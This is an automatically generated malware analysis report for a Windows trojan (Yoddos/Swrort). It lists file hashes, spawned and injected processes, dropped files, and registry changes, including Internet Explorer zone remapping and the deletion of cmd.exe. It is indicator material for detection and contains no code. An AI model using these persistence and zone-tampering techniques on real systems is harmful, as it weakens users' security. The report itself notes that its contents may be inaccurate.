Trojan.Win32.Yoddos.vqa (Kaspersky), Gen:Variant.Kazy.202598 (B) (Emsisoft), Gen:Variant.Kazy.202598 (AdAware), Trojan.Win32.Swrort.3.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 353f881950e6de185c9070fc4b158bd8
SHA1: dd0751b9015b331e55ae36e16921c337cd7e4d7c
SHA256: 74c23477507e1ff67580b3f27a3e06d040a3844db9955facda385be164a48ec9
SSDeep: 98304:eoqowFkRF8IsllQk9Z7hEydAkrpSfJ4O7NuLP:qiFC5JbIB307
Size: 3887109 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: Xacti, LLC
Created at: 2014-09-30 16:54:56
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nvsvc32.exe:2544
hdptlk.exe:2556
ndis500.exe:2916
yYJSx.exe:1976
appmon.exe:3368
%original file name%.exe:228
MiniIE.exe:2752
ndsqp.exe:2956
tray.exe:3316
traytp.exe:452
ndislib.exe:3296
The Trojan injects its code into the following process(es):
Cattle.exe:3444
Explorer.EXE:1572
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process nvsvc32.exe:2544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\HpE\wow64\configWord.cf (676 bytes)
%WinDir%\HpE\wow64\rebuild.exe (8147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\hotkey[1].txt (676 bytes)
%System%\cBLK.dll (2341 bytes)
%System%\clk.ini (186 bytes)
%WinDir%\HpE\wow64\DProEx.sys (1176 bytes)
%WinDir%\HpE\wow64\reTcp.sys (588 bytes)
%WinDir%\HpE\wow64\config.ini (98 bytes)
The Trojan deletes the following file(s):
%System%\cmd.exe (0 bytes)
The process ndis500.exe:2916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\HpE\sys32\weblog.log (263 bytes)
%WinDir%\HpE\sys32\m0gtv9N (3809 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (22 bytes)
The Trojan deletes the following file(s):
%WinDir%\HpE\sys32\m0gtv9N (0 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (0 bytes)
The process yYJSx.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\evaqocv.txt (17 bytes)
%System%\tl.dat (13 bytes)
%System%\bc.dat (3808 bytes)
%System%\tl.txt (1444 bytes)
%WinDir%\HpE\First.txt (23220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yfodbgl.txt (2321 bytes)
%WinDir%\HpE\sys32\urlnav.txt (14076 bytes)
%System%\ndislib.exe (243 bytes)
%WinDir%\HpE\hdptlk.exe (139 bytes)
%WinDir%\HpE\sys32\tray.txt (221016 bytes)
%WinDir%\HpE\wow64\nvsvc32.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tcueuqo.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mwgxskf.txt (673 bytes)
%WinDir%\HpE\exec\traytp.exe (1794 bytes)
%WinDir%\HpE\wow64\nvsvc32.txt (448324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lfllrdu.txt (15278 bytes)
%WinDir%\HpE\MiniIE.txt (175005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\przmycg.txt (673 bytes)
%System%\ndislib.txt (40972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sccppeu.txt (13122 bytes)
%System%\bc.txt (127812 bytes)
%WinDir%\HpE\MiniIE.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uwvmjte.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mxezyyf.txt (7345 bytes)
%WinDir%\HpE\sys32\ndis500.exe (325 bytes)
%WinDir%\HpE\sys32\whitelist.dat (2 bytes)
%WinDir%\HpE\sys32\urlnav.dll (83 bytes)
%System%\appmon.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ihutphk.txt (1425 bytes)
%WinDir%\HpE\sys32\tray.exe (7972 bytes)
%WinDir%\HpE\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rhkqvcb.txt (26096 bytes)
%WinDir%\HpE\sys32\ndis500.txt (55748 bytes)
%System%\lhc.txt (32148 bytes)
%WinDir%\HpE\sys32\ndsqp.exe (106 bytes)
%WinDir%\HpE\exec\traytp.txt (88420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\oqgrsfe.txt (10177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nagsjof.txt (601 bytes)
%WinDir%\HpE\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ipobzxt.txt (4545 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (263811 bytes)
%System%\lhc.dat (185 bytes)
%WinDir%\HpE\sys32\ndsqp.txt (17980 bytes)
The process appmon.exe:3368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\AdbWinUsbApi.dll (60 bytes)
%WinDir%\Temp\adbWinpi.dll (304 bytes)
%WinDir%\Temp\Cattle.exe (3727 bytes)
%WinDir%\Temp\AdbWinApi.dll (96 bytes)
%WinDir%\Temp\TscServer.exe (1653 bytes)
The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PYJT5JHI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\desktop.ini (67 bytes)
%System%\LQdhJ\yYJSx.exe (414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4IK7RMW\desktop.ini (67 bytes)
The process ndsqp.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\HpE\sys32\weblog.log (585 bytes)
%WinDir%\HpE\sys32\oK455Vp (13 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (22 bytes)
The Trojan deletes the following file(s):
%WinDir%\HpE\sys32\oK455Vp (0 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (0 bytes)
The process tray.exe:3316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\HpE\sys32\services.exe (3904 bytes)
The process traytp.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\HpE\exec\ico.ini (292 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\statbar[1].ini (152 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\traytp.lnk (640 bytes)
The process ndislib.exe:3296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\v9pce8W (1629 bytes)
%System%\weblog.log (349 bytes)
%System%\gy17y1D.sys (22 bytes)
The Trojan deletes the following file(s):
%System%\v9pce8W (0 bytes)
%System%\gy17y1D.sys (0 bytes)
Registry activity
The process nvsvc32.exe:2544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1609" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\Microsoft.IE]
"(Default)" = "%WinDir%\HpE\wow64\rebuild.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\123]
"HomePage" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E F9 A4 E8 40 EC 6D 61 0B 7E 1F AF 80 CE 12 74"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\DProEx]
[HKLM\System\CurrentControlSet\Services\FixTool\Enum]
[HKLM\System\CurrentControlSet\Services\FixTool\Security]
[HKLM\System\CurrentControlSet\Services\DProEx\Enum]
[HKLM\System\CurrentControlSet\Services\FixTool]
[HKLM\System\CurrentControlSet\Services\DProEx\Security]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process hdptlk.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\HpE\sys32\urlnav.dll"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"
[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"
[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"
[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 25 ED 45 9E EA 26 3B 22 EC 5B F9 23 D4 A4 EC"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\HpE\sys32\urlnav.dll"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\HpE\sys32\"
The process Cattle.exe:3444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 32 30 F8 40 1A 87 6C B9 71 22 D2 A7 1C 4B 3D"
The process ndis500.exe:2916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 15 B6 36 09 56 56 81 4F 4C 6F EB 9D D1 BD 06"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\lf3qZKD\Enum]
[HKLM\System\CurrentControlSet\Services\lf3qZKD\Security]
[HKLM\System\CurrentControlSet\Services\lf3qZKD]
The process yYJSx.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 24 F8 5D 45 D7 83 69 E9 0E 49 A2 2F 38 B9 86"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process appmon.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 B9 63 7A E1 CE 31 05 6D D3 6D 47 51 32 E1 D1"
The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 1A 04 5F 39 2C 57 66 95 F8 4B 10 42 E7 97 B1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process MiniIE.exe:2752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 0A 14 13 3E 46 6C 22 03 26 65 B4 F9 35 D6 04"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"DefaultValue" = "yes"
[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\HpE\MiniIE.exe"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"DisableScriptDebuggerIE" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"CheckedValue" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"CheckedValue" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"MiniIE.exe" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"UncheckedValue" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "10"
"MaxConnectionsPer1_0Server" = "10"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"DefaultValue" = "yes"
The process ndsqp.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 05 C7 C8 F2 40 05 76 5F 84 40 05 CD 63 B2 3B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\n1P2bmf\Security]
[HKLM\System\CurrentControlSet\Services\n1P2bmf]
[HKLM\System\CurrentControlSet\Services\n1P2bmf\Enum]
The process tray.exe:3316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 1D E8 4C A5 82 0E 16 7C 1A D1 51 96 20 02 BC"
The process traytp.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
